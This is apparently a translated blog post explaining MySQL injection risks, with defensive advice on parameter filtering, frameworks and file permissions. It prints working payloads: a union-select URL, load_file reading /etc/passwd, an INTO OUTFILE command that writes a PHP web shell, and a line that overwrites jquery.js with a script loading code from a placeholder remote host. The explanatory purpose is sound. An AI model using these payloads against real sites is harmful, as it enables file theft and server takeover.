The system operating system file injected by mysql

Others 2022-04-28 18:02:36 views: 0

The most typical scenario of mysql injection is to not filter parameters, such as a typical statement, selecting a user information to display php code:

$sql = "select * from  user where id={$_GET['id']}";

The user only needs to modify the following URL in the browser address bar, for example: id=23:

http://xxx.com/xxx?id=23 union all select * from user;

This filters out all users.

The natural way to avoid this kind of thing is to use parameter filtering, which can be solved with mysql_real_escape_string in the database driver interface. Of course, the safest thing is to use the framework to write code. The framework has taken good precautions against mysql injection. However, after using the framework, you must remember to try not to evaluate SQL statements. As long as you splicing, you must consider the injection problem.

What I want to mention here is that mysql also has a function that can load files for display, such as:

select load_file('/etc/passwd');

The natural way to avoid this problem is to do parameter filtering.

 

It can also write to files like:

select '<?php system(\'cat /etc/passwd\'); ?>' into outfile '/data/web/www/command.php';

In this way, the user can enter command.php from the URL to access the page, so as to achieve the purpose of viewing user information in the Linux system. Of course, this method can also inject code into each js of the website.

In addition to parameter filtering, the method to avoid this problem can also make mysql run under the mysql user, and use the apache user or www user for website files, and do not simply set all file permissions to 777.

Windows users are miserable. If the native method writes the code and does not filter the parameters, it is very simple to inject code into the website js, such as:

select '<script src=\'http://xxxx.xxx.com/xxx.js\'>' into outfile 'D:\\web\\www\\htdocs\\js\\jquery.js';

This statement will inject dangerous js code into jquery.js. Of course, you can also write a php file and execute it. This file can do whatever you want. Anyway, the php file can operate the server file.

 

Guess you like

Origin http://43.154.161.224:23101/article/api/json?id=326468480&siteId=291194637
Recommended
The United States plans to restrict the export of large AI models to China and Russia
Apple to reach agreement with OpenAI to bring ChatGPT to iPhone
Ranking
whisper-webui installation tutorial is silky and easy to use
[Base] Laravel concepts laravel basis, the custom service provider: Contracts, ServiceContainer, ServiceProvider, Facades relations
Import torchvision error problem solving DLL: module not found
observer & watch & notify = pub & sub
A small turntable program [HTML + CSS + JS]
CorelDRAW 2018 shortcuts Daquan
Supervise el botón de menú para lograr un gatillo de presión prolongada
JS将时间秒转换成天小时分钟秒的字符串
RIP basic configuration
[Deleted] solution to a problem a few questions (Noip1994)
Daily
More
2024-05-11(32)
2024-05-10(34)
2024-05-09(32)
2024-05-08(18)
2024-05-07(34)
2024-05-06(6)
2024-05-05(0)
2024-05-04(18)
2024-05-03(8)
2024-05-02(0)

Code World

© 2018 codetd.com